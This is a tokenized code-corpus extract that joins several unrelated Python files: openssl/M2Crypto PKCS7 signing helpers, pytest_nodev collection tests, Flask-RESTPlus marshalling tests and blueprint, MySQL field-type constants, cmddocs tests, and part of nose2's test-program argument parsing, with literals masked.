join ( cand , name ) <EOL> if check ( cand ) : <EOL> return cand <EOL> return None <EOL> openssl = find_executable ( "<STR_LIT>" ) <EOL> if not openssl : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> def sign_openssl ( keyfile , content ) : <EOL> """<STR_LIT>""" <EOL> key , cs , stack = parse_keyfile ( keyfile ) <EOL> with NamedTemporaryFile ( ) as signer : <EOL> print >> signer , key <EOL> print >> signer , cs <EOL> signer . flush ( ) <EOL> with NamedTemporaryFile ( ) as certfile : <EOL> for c in stack : <EOL> print >> certfile , c <EOL> certfile . flush ( ) <EOL> with NamedTemporaryFile ( ) as infile : <EOL> infile . write ( content ) <EOL> infile . flush ( ) <EOL> return check_output ( ( openssl , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , signer . name , <EOL> "<STR_LIT>" , certfile . name , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , infile . name ) , <EOL> bufsize = <NUM_LIT:0> ) <EOL> @ wraps ( sign_openssl ) <EOL> def sign_openssl_warn ( * args , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( openssl , ) , <EOL> RuntimeWarning <EOL> ) <EOL> return sign_openssl ( * args , ** kw ) <EOL> sign_openssl_warn . generator = sign_openssl . generator = check_output ( ( openssl , "<STR_LIT:version>" ) ) . strip ( ) <EOL> except ImportError : <EOL> sign_openssl_warn = sign_openssl = None <EOL> try : <EOL> import M2Crypto as M2 <EOL> import M2Crypto . SMIME as M2S <EOL> import M2Crypto . X509 as M2X509 <EOL> from M2Crypto . BIO import MemoryBuffer as M2Buffer <EOL> from M2Crypto . EVP import EVPError as M2EVPError <EOL> def sign_m2 ( keyfile , content ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( keyfile , "<STR_LIT:name>" ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> with NamedTemporaryFile ( ) as kp : <EOL> with StreamPositionRestore ( kp ) : <EOL> with StreamPositionRestore ( keyfile ) : <EOL> kp . write ( keyfile . 
read ( ) ) <EOL> return sign_m2 ( kp , content ) <EOL> try : <EOL> stack = M2X509 . X509_Stack ( ) <EOL> _ , _ , certificates = parse_keyfile ( keyfile ) <EOL> for c in certificates : <EOL> cert = M2X509 . load_cert_string ( c ) <EOL> if ( cert . check_ca ( ) <EOL> and str ( cert . get_issuer ( ) ) == str ( cert . get_subject ( ) ) ) : <EOL> continue <EOL> stack . push ( cert ) <EOL> smime = M2S . SMIME ( ) <EOL> smime . load_key ( keyfile . name ) <EOL> smime . set_x509_stack ( stack ) <EOL> pkcs7 = M2Buffer ( ) <EOL> smime . sign ( M2Buffer ( content ) , <EOL> M2S . PKCS7_DETACHED | M2S . PKCS7_BINARY <EOL> ) . write_der ( pkcs7 ) <EOL> return pkcs7 . read ( ) <EOL> except M2EVPError , ex : <EOL> if re . search ( "<STR_LIT>" , ex . message ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> sign_m2 . generator = "<STR_LIT>" % M2 . version <EOL> except ImportError : <EOL> sign_m2 = None <EOL> sign = sign_m2 or sign_openssl_warn <EOL> if not sign : <EOL> raise ImportError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from builtins import list <EOL> import pytest <EOL> from pytest_nodev import blacklists <EOL> from pytest_nodev import collect <EOL> def test_import_coverage ( ) : <EOL> """<STR_LIT>""" <EOL> from imp import reload <EOL> reload ( blacklists ) <EOL> reload ( collect ) <EOL> def test_collect_stdlib_distributions ( ) : <EOL> stdlib_distributions = list ( collect . collect_stdlib_distributions ( ) ) <EOL> assert len ( stdlib_distributions ) == <NUM_LIT:1> <EOL> _ , module_names = stdlib_distributions [ <NUM_LIT:0> ] <EOL> assert len ( module_names ) > <NUM_LIT:10> <EOL> def test_collect_installed_distributions ( ) : <EOL> installed_distributions = list ( collect . collect_installed_distributions ( ) ) <EOL> assert len ( installed_distributions ) > <NUM_LIT:1> <EOL> for spec , module_names in installed_distributions : <EOL> if spec . startswith ( '<STR_LIT>' ) : <EOL> break <EOL> assert module_names == [ '<STR_LIT>' ] <EOL> def test_collect_distributions ( ) : <EOL> distributions = list ( collect . collect_distributions ( [ '<STR_LIT>' ] ) ) <EOL> assert len ( distributions ) == <NUM_LIT:1> <EOL> _ , module_names = distributions [ <NUM_LIT:0> ] <EOL> assert len ( module_names ) == <NUM_LIT:1> <EOL> assert len ( list ( collect . collect_distributions ( [ '<STR_LIT>' ] ) ) ) == <NUM_LIT:0> <EOL> def test_import_module ( ) : <EOL> assert collect . import_module ( '<STR_LIT>' ) <EOL> with pytest . raises ( ImportError ) : <EOL> collect . import_module ( '<STR_LIT>' , module_blacklist_pattern = '<STR_LIT>' ) <EOL> with pytest . raises ( ImportError ) : <EOL> collect . import_module ( '<STR_LIT>' ) <EOL> def test_import_distributions ( ) : <EOL> distributions = [ ( '<STR_LIT>' , [ '<STR_LIT>' ] ) ] <EOL> module_names = list ( collect . 
import_distributions ( distributions ) ) <EOL> assert module_names == [ '<STR_LIT>' ] <EOL> distributions = [ ( '<STR_LIT>' , [ '<STR_LIT>' ] ) ] <EOL> module_names = list ( collect . import_distributions ( distributions ) ) <EOL> assert module_names == [ ] <EOL> def test_generate_module_objects ( ) : <EOL> expected_item = ( '<STR_LIT>' , collect . generate_module_objects ) <EOL> assert expected_item in list ( collect . generate_module_objects ( collect ) ) <EOL> def test_generate_objects_from_modules ( ) : <EOL> import re <EOL> modules = { '<STR_LIT>' : collect , '<STR_LIT>' : re } <EOL> include_patterns = [ '<STR_LIT>' ] <EOL> objs = collect . generate_objects_from_modules ( <EOL> modules , include_patterns , module_blacklist_pattern = '<STR_LIT>' ) <EOL> assert len ( list ( objs ) ) == <NUM_LIT:1> <EOL> def test_object_from_name ( ) : <EOL> object_ = collect . object_from_name ( '<STR_LIT>' ) <EOL> assert object_ is collect . object_from_name <EOL> object_ = collect . object_from_name ( '<STR_LIT>' ) <EOL> assert object_ == collect . NOMATCH_PATTERN . upper </s>
<s> from __future__ import unicode_literals <EOL> from flask import url_for , Blueprint , render_template <EOL> class Apidoc ( Blueprint ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . registered = False <EOL> super ( Apidoc , self ) . __init__ ( * args , ** kwargs ) <EOL> def register ( self , * args , ** kwargs ) : <EOL> super ( Apidoc , self ) . register ( * args , ** kwargs ) <EOL> self . registered = True <EOL> apidoc = Apidoc ( '<STR_LIT>' , __name__ , <EOL> template_folder = '<STR_LIT>' , <EOL> static_folder = '<STR_LIT>' , <EOL> static_url_path = '<STR_LIT>' , <EOL> ) <EOL> @ apidoc . add_app_template_global <EOL> def swagger_static ( filename ) : <EOL> return url_for ( '<STR_LIT>' , <EOL> filename = '<STR_LIT>' . format ( filename ) ) <EOL> def ui_for ( api ) : <EOL> '''<STR_LIT>''' <EOL> return render_template ( '<STR_LIT>' , title = api . title , <EOL> specs_url = api . specs_url ) </s>
<s> from __future__ import unicode_literals <EOL> from flask_restplus import ( <EOL> marshal , marshal_with , marshal_with_field , fields , Api , Resource <EOL> ) <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> from . import TestCase <EOL> class HelloWorld ( Resource ) : <EOL> def get ( self ) : <EOL> return { } <EOL> class MarshallingTestCase ( TestCase ) : <EOL> def test_marshal ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> marshal_dict = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( marshal_dict , model ) <EOL> self . assertEquals ( output , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_marshal_with_envelope ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> marshal_dict = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( marshal_dict , model , envelope = '<STR_LIT>' ) <EOL> self . assertEquals ( output , { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> def test_marshal_decorator ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model ) <EOL> def try_me ( ) : <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEquals ( try_me ( ) , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_marshal_decorator_with_envelope ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model , envelope = '<STR_LIT>' ) <EOL> def try_me ( ) : <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . 
assertEquals ( try_me ( ) , { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> def test_marshal_decorator_tuple ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model ) <EOL> def try_me ( ) : <EOL> headers = { '<STR_LIT>' : <NUM_LIT> } <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <NUM_LIT:200> , headers <EOL> self . assertEquals ( try_me ( ) , ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } ) ) <EOL> def test_marshal_decorator_tuple_with_envelope ( self ) : <EOL> model = OrderedDict ( [ ( '<STR_LIT:foo>' , fields . Raw ) ] ) <EOL> @ marshal_with ( model , envelope = '<STR_LIT>' ) <EOL> def try_me ( ) : <EOL> headers = { '<STR_LIT>' : <NUM_LIT> } <EOL> return OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <NUM_LIT:200> , headers <EOL> self . assertEquals ( try_me ( ) , <EOL> ( { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } ) ) <EOL> def test_marshal_field_decorator ( self ) : <EOL> model = fields . Raw <EOL> @ marshal_with_field ( model ) <EOL> def try_me ( ) : <EOL> return '<STR_LIT:foo>' <EOL> self . assertEquals ( try_me ( ) , '<STR_LIT:foo>' ) <EOL> def test_marshal_field_decorator_tuple ( self ) : <EOL> model = fields . Raw <EOL> @ marshal_with_field ( model ) <EOL> def try_me ( ) : <EOL> return '<STR_LIT:foo>' , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEquals ( ( '<STR_LIT:foo>' , <NUM_LIT:200> , { '<STR_LIT>' : <NUM_LIT> } ) , try_me ( ) ) <EOL> def test_marshal_field ( self ) : <EOL> model = OrderedDict ( { '<STR_LIT:foo>' : fields . Raw ( ) } ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> self . 
assertEquals ( output , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> def test_marshal_tuple ( self ) : <EOL> model = OrderedDict ( { '<STR_LIT:foo>' : fields . Raw } ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( ( marshal_fields , ) , model ) <EOL> self . assertEquals ( output , [ { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ] ) <EOL> def test_marshal_tuple_with_envelope ( self ) : <EOL> model = OrderedDict ( { '<STR_LIT:foo>' : fields . Raw } ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> output = marshal ( ( marshal_fields , ) , model , envelope = '<STR_LIT>' ) <EOL> self . assertEquals ( output , { '<STR_LIT>' : [ { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ] } ) <EOL> def test_marshal_nested ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( { <EOL> '<STR_LIT>' : fields . String , <EOL> } ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , OrderedDict ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) <EOL> ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_with_non_null ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . 
String ) <EOL> ] ) , allow_null = False ) ) <EOL> ] ) <EOL> marshal_fields = [ OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None ) ] ) ] <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = [ OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , OrderedDict ( [ ( '<STR_LIT>' , None ) , ( '<STR_LIT>' , None ) ] ) ) <EOL> ] ) ] <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_with_null ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = True ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , None ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_allow_null_presents_data ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = True ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , OrderedDict ( [ ( '<STR_LIT>' , None ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) <EOL> ] ) <EOL> self . 
assertEquals ( output , expected ) <EOL> def test_marshal_nested_property ( self ) : <EOL> class TestObject ( object ) : <EOL> @ property <EOL> def fee ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . Nested ( <EOL> OrderedDict ( [ <EOL> ( '<STR_LIT>' , fields . String ) , <EOL> ( '<STR_LIT>' , fields . String ) <EOL> ] ) , allow_null = True ) ) <EOL> ] ) <EOL> obj = TestObject ( ) <EOL> obj . foo = '<STR_LIT:bar>' <EOL> obj . bat = '<STR_LIT>' <EOL> output = marshal ( [ obj ] , model ) <EOL> expected = [ OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , OrderedDict ( [ <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] ) ) <EOL> ] ) ] <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_list ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . List ( fields . String ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_list_of_nesteds ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . List ( fields . Nested ( { <EOL> '<STR_LIT>' : fields . 
String <EOL> } ) ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , [ OrderedDict ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ] ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_list_of_lists ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . List ( fields . List ( <EOL> fields . String ) ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_dict ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT:bar>' , OrderedDict ( [ <EOL> ( '<STR_LIT:a>' , fields . Raw ) , <EOL> ( '<STR_LIT:b>' , fields . Raw ) , <EOL> ] ) ) , <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:bar>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:b>' , <NUM_LIT:2> ) , ( '<STR_LIT:c>' , <NUM_LIT:3> ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:bar>' , OrderedDict ( [ ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:b>' , <NUM_LIT:2> ) ] ) ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_will_prettyprint_json_in_debug_mode ( self ) : <EOL> self . app . 
config [ '<STR_LIT>' ] = True <EOL> api = Api ( self . app ) <EOL> class Foo1 ( Resource ) : <EOL> def get ( self ) : <EOL> return { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> api . add_resource ( Foo1 , '<STR_LIT>' , endpoint = '<STR_LIT:bar>' ) <EOL> with self . app . test_client ( ) as client : <EOL> foo = client . get ( '<STR_LIT>' ) <EOL> lines = foo . data . splitlines ( ) <EOL> lines = [ line . decode ( ) for line in lines ] <EOL> self . assertEquals ( "<STR_LIT:{>" , lines [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( lines [ <NUM_LIT:1> ] . startswith ( '<STR_LIT:U+0020>' ) ) <EOL> self . assertTrue ( lines [ <NUM_LIT:2> ] . startswith ( '<STR_LIT:U+0020>' ) ) <EOL> self . assertEquals ( "<STR_LIT:}>" , lines [ <NUM_LIT:3> ] ) <EOL> self . assertTrue ( foo . data . endswith ( b'<STR_LIT:\n>' ) ) <EOL> def test_json_float_marshalled ( self ) : <EOL> api = Api ( self . app ) <EOL> class FooResource ( Resource ) : <EOL> fields = { '<STR_LIT:foo>' : fields . Float } <EOL> def get ( self ) : <EOL> return marshal ( { "<STR_LIT:foo>" : <NUM_LIT> } , self . fields ) <EOL> api . add_resource ( FooResource , '<STR_LIT>' ) <EOL> app = self . app . test_client ( ) <EOL> resp = app . get ( '<STR_LIT>' ) <EOL> self . assertEquals ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEquals ( resp . data . decode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) </s>
<s> DECIMAL = <NUM_LIT:0> <EOL> TINY = <NUM_LIT:1> <EOL> SHORT = <NUM_LIT:2> <EOL> LONG = <NUM_LIT:3> <EOL> FLOAT = <NUM_LIT:4> <EOL> DOUBLE = <NUM_LIT:5> <EOL> NULL = <NUM_LIT:6> <EOL> TIMESTAMP = <NUM_LIT:7> <EOL> LONGLONG = <NUM_LIT:8> <EOL> INT24 = <NUM_LIT:9> <EOL> DATE = <NUM_LIT:10> <EOL> TIME = <NUM_LIT:11> <EOL> DATETIME = <NUM_LIT:12> <EOL> YEAR = <NUM_LIT> <EOL> NEWDATE = <NUM_LIT> <EOL> VARCHAR = <NUM_LIT:15> <EOL> BIT = <NUM_LIT:16> <EOL> TIMESTAMP2 = <NUM_LIT> <EOL> DATETIME2 = <NUM_LIT> <EOL> TIME2 = <NUM_LIT> <EOL> NEWDECIMAL = <NUM_LIT> <EOL> ENUM = <NUM_LIT> <EOL> SET = <NUM_LIT> <EOL> TINY_BLOB = <NUM_LIT> <EOL> MEDIUM_BLOB = <NUM_LIT> <EOL> LONG_BLOB = <NUM_LIT> <EOL> BLOB = <NUM_LIT> <EOL> VAR_STRING = <NUM_LIT> <EOL> STRING = <NUM_LIT> <EOL> GEOMETRY = <NUM_LIT:255> <EOL> CHAR = TINY <EOL> INTERVAL = ENUM </s>
<s> from cmddocs import Cmddocs <EOL> def test_do_delete_edit ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_edit ( "<STR_LIT>" , test = True ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert out . startswith ( "<STR_LIT>" ) <EOL> def test_do_delete_edit_commitmsg ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_log ( "<STR_LIT>" ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert "<STR_LIT>" in out <EOL> def test_do_delete ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_delete ( "<STR_LIT>" ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert out == "<STR_LIT>" <EOL> def test_do_delete_log_commitmsg ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_log ( "<STR_LIT>" ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert "<STR_LIT>" in out </s>
<s>
# nose2 test program entry point (corpus extract: <STR_LIT>/<NUM_LIT>
# placeholders stand in for the original literals).
import logging
import os
import sys

from nose2.compat import unittest
from nose2 import events, loader, runner, session, util

log = logging.getLogger(__name__)
__unittest = True


class PluggableTestProgram(unittest.TestProgram):
    """<STR_LIT>"""
    # Factory classes used to build the session, loader and runner;
    # subclasses may override any of these to customise behaviour.
    sessionClass = session.Session
    _currentSession = None  # class-level handle to the most recent session
    loaderClass = loader.PluggableTestLoader
    runnerClass = runner.PluggableTestRunner
    # Plugin module names loaded by default (names masked by tokenization).
    defaultPlugins = ('<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      '<STR_LIT>',
                      )
    excludePlugins = ()

    def __init__(self, **kw):
        # Pull our extension keywords out of kw before unittest's
        # TestProgram sees (and rejects) them.
        plugins = kw.pop('<STR_LIT>', [])
        exclude = kw.pop('<STR_LIT>', [])
        hooks = kw.pop('<STR_LIT>', [])
        # Copy the class-level tuples into per-instance lists so later
        # extend() calls do not mutate shared class state.
        self.defaultPlugins = list(self.defaultPlugins)
        self.excludePlugins = list(self.excludePlugins)
        self.extraHooks = hooks
        self.defaultPlugins.extend(plugins)
        self.excludePlugins.extend(exclude)
        super(PluggableTestProgram, self).__init__(**kw)

    def parseArgs(self, argv):
        """<STR_LIT>"""
        self.session = self.sessionClass()
        self.__class__._currentSession = self.session
        self.argparse = self.session.argparse
        self.testLoader = self.loaderClass(self.session)
        self.session.testLoader = self.testLoader
        self.setInitialArguments()
        # First pass: parse only the config-level options so plugins can
        # register their own arguments before the final parse.
        cfg_args, argv = self.argparse.parse_known_args(argv[<NUM_LIT:1>:])
        self.handleCfgArgs(cfg_args)
        self.argparse.add_argument('<STR_LIT>', nargs='<STR_LIT:*>')
        self.argparse.add_argument('<STR_LIT>', '<STR_LIT>', action='<STR_LIT>',
                                   help=('<STR_LIT>'))
        # Second pass: anything still unrecognised is a usage error.
        args, argv = self.argparse.parse_known_args(argv)
        if argv:
            self.argparse.error("<STR_LIT>" % '<STR_LIT:U+0020>'.join(argv))
        self.handleArgs(args)
        self.createTests()

    def setInitialArguments(self):
        """<STR_LIT>"""
        self.argparse.add_argument(
            '<STR_LIT>', '<STR_LIT>', default=None,
            help="<STR_LIT>")
        self.argparse.add_argument(
            '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
            help='<STR_LIT>')
        self.argparse.add_argument(
            '<STR_LIT>', '<STR_LIT:-c>', nargs='<STR_LIT:?>', action='<STR_LIT>',
            default=['<STR_LIT>', '<STR_LIT>'],
            help="<STR_LIT>"
                 "<STR_LIT>")
        self.argparse.add_argument(
            '<STR_LIT>', action='<STR_LIT>',
            dest='<STR_LIT>', const=False, default=True,
            help="<STR_LIT>")
        self.argparse.add_argument(
            '<STR_LIT>', action='<STR_LIT>',
            dest='<STR_LIT>', const=False, default=True,
            help="<STR_LIT>"
                 "<STR_LIT>")
        self.argparse.add_argument(
            '<STR_LIT>', action='<STR_LIT>',
            dest='<STR_LIT>', default=[],
            help="<STR_LIT>")
        self.argparse.add_argument(
            '<STR_LIT>', action='<STR_LIT>',
            dest='<STR_LIT>', default=[],
            help="<STR_LIT>")
        self.argparse.add_argument(
            '<STR_LIT>', '<STR_LIT>', action='<STR_LIT:count>', default=<NUM_LIT:0>, help="<STR_LIT>")
        self.argparse.add_argument('<STR_LIT>', action='<STR_LIT>',
                                   dest='<STR_LIT>', const=<NUM_LIT:0>)
        self.argparse.add_argument(
            '<STR_LIT>', default=logging.WARN,
            help='<STR_LIT>')

    def handleCfgArgs(self, cfg_args):
        """<STR_LIT>"""
        self.session.logLevel = util.parse_log_level(cfg_args.log_level)
        logging.basicConfig(level=self.session.logLevel)
        log.debug('<STR_LIT>', cfg_args.log_level)
        if cfg_args.verbose:
            self.session.verbosity += cfg_args.verbose
        self.session.startDir = cfg_args.start_dir
        if cfg_args.top_level_directory:
            self.session.topLevelDir = cfg_args.top_level_directory
        self.session.loadConfigFiles(*self.findConfigFiles(cfg_args))
        self.session.setStartDir()
        self.session.prepareSysPath()
        if cfg_args.load_plugins:
            self.defaultPlugins.extend(cfg_args.plugins)
            self.excludePlugins.extend(cfg_args.exclude_plugins)
            self.loadPlugins()
        elif cfg_args.plugins or cfg_args.exclude_plugins:
            # Plugin options were given but plugin loading is disabled;
